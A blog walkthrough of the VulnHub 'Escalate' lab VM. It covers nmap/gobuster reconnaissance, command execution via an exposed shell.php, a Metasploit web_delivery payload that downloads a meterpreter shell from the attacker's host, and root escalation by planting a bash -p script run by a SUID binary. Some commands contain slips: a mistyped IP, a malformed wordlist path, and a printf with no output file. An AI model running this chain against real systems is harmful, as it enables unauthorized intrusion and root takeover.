VulnHub Escalate Writeup

In this post, you will learn both horizontal and vertical privilege escalation to gain root access to the machine.

The machine is provided by VulnHub: https://www.vulnhub.com/entry/escalate_linux-1,323/

Before we go into the process of gaining root shell, you should learn about the difference between vertical and privilege escalation. In the case of horizontal escalation, you gain an initial foothold as a normal low-privileged user and then you enumerate the system and escalate some other low-privileged user and holds the permission of a new user.

In case of vertical escalation, the initial foothold condition is the same (low-privileged user) and then after enumerating the system you find binaries or vulnerable applications that could escalate you to root user

Reconnaissance

In my case, the IP address of the vulnerable machine is 192.168.1.46 You can also find it using a simple Nmap's ping scan

Finding open ports and services on the machine

nmap 192.168.1.46 -sV --min-rate 1000

As you can check HTTP 80 port is open. This means it is running a web server that can be accessed by visiting http://192.168.1.46

Since I couldn't find any information on the webpage, it's time to perform a directory brute force search. I will be using gobuster for this case

gobuster dir -e -u http://192.168.1.46 -w /usr/share /usr/share/dirbuster/directory-list-2.3-medium.txt -x php,html,cgi,sh

On checking, I found that shell.php that accept cmd query parameter runs the OS command and echo the output of the same. Using this we can perform RCE on the system

curl http://192.169.1.46/shell.php?cmd=id

Initial Foothold

On searching in Metasploit modules, I found an interesting module that will download and spawn meterpreter shell regardless of the operating system.

msf6 > search type:exploit web delivery
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.1.17
msf6 exploit(multi/script/web_delivery) > run

The only requirement of this module is system should have a python interpreter installed

Go get the interactive shell by executing the following command on meterpreter

meterpreter > execute -f /bin/bash -i -a "-i"

This will now spawn a bash script by executing /bin/bash -i

Privilege Escalation

Again, you will have to enumerate the SUID binaries. It's my first approach to find an exploitable vector.

find / -type f -perm -4001 -exec ls -l {} \; 2> /dev/null

Explanation of the command

  • find / – check the files in from root directory recursively
  • -type f – find only files
  • -perm -4001 – find files that have SUID bit set and are executable
  • -exec ls -l {} \; –  execute ls -l command on each entry

There are two files that are suspicious files that should not be having SUID bit

/home/user5/script
/home/user3/shell

If you want a refresher on suid bits and know how to exploit the misconfigurations, there are already posts on my blog: Demystifying SUID and SGID bit and Exploiting SUID Binaries to Get Root User Shell

Let's go with the file /home/user3/shell

It is executing a file named .script.sh file in the same directory. Since the file is relative and you can create your own file

printf "#\!/bin/sh\n\n/bin/bash -i -p"

The above command will create the following file

#!/bin/sh

/bin/bash -i -p

In this -i will tell bash to spawn an interactive shell with privileged prompt (-p)

Since this is owned by the root user, the privileged bash shell will get you root shell

Goal achieved! Rooted like a boss 😎

Gurkirat Singh

Gurkirat Singh

Hey there everyone, I am Gurkirat Singh (aka tbhaxor). I do full-stack development to fund my own learning and experiments. I am a cybersecurity enthusiast and like sharing my knowledge.
India